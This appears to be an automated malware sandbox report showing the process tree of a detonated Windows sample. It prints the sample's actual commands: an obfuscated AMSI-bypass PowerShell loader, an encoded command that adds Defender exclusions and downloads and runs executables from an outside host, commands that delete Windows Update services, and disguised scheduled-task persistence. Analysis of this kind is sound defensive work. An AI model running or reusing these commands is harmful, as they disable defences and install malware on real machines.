$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+'m.'+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'oft'+'.'+''+[Char](87)+'i'+'n'+''+'3'+''+'2'+''+'.'+''+[Char](85)+'n'+'s'+''+[Char](97)+''+[Char](102)+'eL'+[Char](109)+''+'w'+''+'y'+''+[Char](68)+''+[Char](118)+''+[Char](80)+''+[Char](68)+''+[Char](82)+'m'+[Char](119)+''+[Char](84)+''+'o'+'');$jfHSrvSwYckbyj=$LmwyDvPDRmwTo.GetMethod(''+[Char](106)+''+[Char](102)+''+[Char](72)+'S'+[Char](114)+''+'v'+'S'+'w'+''+'Y'+''+[Char](99)+''+[Char](107)+'by'+'j'+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'bl'+'i'+''+'c'+''+','+''+[Char](83)+''+'t'+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TtXOZISESTAgtGLhVbe=OcEjBmjgkqZE @([String])([IntPtr]);$OPlYhYTDvkVwbwnYfLIpIh=OcEjBmjgkqZE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EOqtELjGinv=$LmwyDvPDRmwTo.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'eHa'+[Char](110)+'dl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+'l'+[Char](51)+'2'+'.'+''+'d'+'l'+[Char](108)+'')));$SokzxZuWvUOqSr=$jfHSrvSwYckbyj.Invoke($Null,@([Object]$EOqtELjGinv,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$voNdPwZDqEgdXqoQH=$jfHSrvSwYckbyj.Invoke($Null,@([Object]$EOqtELjGinv,[Object](''+'V'+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'ro'+'t'+'e'+[Char](99)+''+[Char](116)+'')));$NciKAJs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SokzxZuWvUOqSr,$TtXOZISESTAgtGLhVbe).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'');$XEbaxMhIhaXiyJRRl=$jfHSrvSwYckbyj.Invoke($Null,@([Object]$NciKAJs,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$GclceAqNtj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($voNdPwZDqEgdXqoQH,$OPlYhYTDvkVwbwnYfLIpIh).Invoke($XEbaxMhIhaXiyJRRl,[uint32]8,4,[ref]$GclceAqNtj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$XEbaxMhIhaXiyJRRl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($voNdPwZDqEgdXqoQH,$OPlYhYTDvkVwbwnYfLIpIh).Invoke($XEbaxMhIhaXiyJRRl,[uint32]8,0x20,[ref]$GclceAqNtj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+'i'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2164 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3188
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FlkHFSwuvhcy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MTIDPedFieEzvx,[Parameter(Position=1)][Type]$HmudUNTBMo)$YIVhPyEkwTn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+[Char](99)+'t'+[Char](101)+''+'d'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'','Cla'+[Char](115)+''+'s'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'ea'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+'a'+''+'s'+'s,'+'A'+''+[Char](117)+''+'t'+'o'+[Char](67)+''+[Char](108)+'ass',[MulticastDelegate]);$YIVhPyEkwTn.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+'By'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$MTIDPedFieEzvx).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$YIVhPyEkwTn.DefineMethod('I'+[Char](110)+''+'v'+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+'r'+'t'+'u'+''+'a'+'l',$HmudUNTBMo,$MTIDPedFieEzvx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $YIVhPyEkwTn.CreateType();}$bOljwQoVhKzJu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType('M'+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+'e'+''+[Char](98)+'O'+[Char](108)+'j'+[Char](119)+'QoV'+'h'+'Kz'+[Char](74)+''+[Char](117)+'');$ulVLbmIRNnkqpL=$bOljwQoVhKzJu.GetMethod(''+'u'+''+[Char](108)+'V'+[Char](76)+''+[Char](98)+''+[Char](109)+''+'I'+''+[Char](82)+''+'N'+''+'n'+''+[Char](107)+''+[Char](113)+''+[Char](112)+''+[Char](76)+'',[Reflection.BindingFlags]''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cGYxrKniMvCEgtFGiLN=FlkHFSwuvhcy @([String])([IntPtr]);$GneWzfSrFvDGmTrimjKMxY=FlkHFSwuvhcy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NKwFEpWsVKS=$bOljwQoVhKzJu.GetMethod('G'+'e'+'t'+[Char](77)+'o'+'d'+''+'u'+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')));$hsBMXpVMtYLgHI=$ulVLbmIRNnkqpL.Invoke($Null,@([Object]$NKwFEpWsVKS,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$aNcRhhaZotHakvBxD=$ulVLbmIRNnkqpL.Invoke($Null,@([Object]$NKwFEpWsVKS,[Object](''+[Char](86)+'i'+'r'+'tu'+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'te'+'c'+'t')));$XIqFqCZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hsBMXpVMtYLgHI,$cGYxrKniMvCEgtFGiLN).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$uKVnavRKeeDMiuZsi=$ulVLbmIRNnkqpL.Invoke($Null,@([Object]$XIqFqCZ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$zecGtZcWUc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aNcRhhaZotHakvBxD,$GneWzfSrFvDGmTrimjKMxY).Invoke($uKVnavRKeeDMiuZsi,[uint32]8,4,[ref]$zecGtZcWUc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uKVnavRKeeDMiuZsi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aNcRhhaZotHakvBxD,$GneWzfSrFvDGmTrimjKMxY).Invoke($uKVnavRKeeDMiuZsi,[uint32]8,0x20,[ref]$zecGtZcWUc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+'a'+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:740
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
PID:3596 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"3⤵
- Creates scheduled task(s)
PID:4552 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4036
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1192
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2700
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3408
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4232
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4232 -s 8322⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4192
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4416
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:4356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2372
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:2100
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3740
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4764
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3832
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3244
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3244 -s 9562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1708
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:2420
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\8aae493caafa6e42a5a7afe431aeac120ce4c152.exe"C:\Users\Admin\AppData\Local\Temp\8aae493caafa6e42a5a7afe431aeac120ce4c152.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:3660
-
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 5086⤵
- Program crash
PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4512 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:2400 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4980
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 2443⤵
- Program crash
PID:4924
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4056
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:788
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1792
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3312
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5008
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1296
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4968
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1608
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:5100
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1080
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1336
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2660
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2376
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2360
-
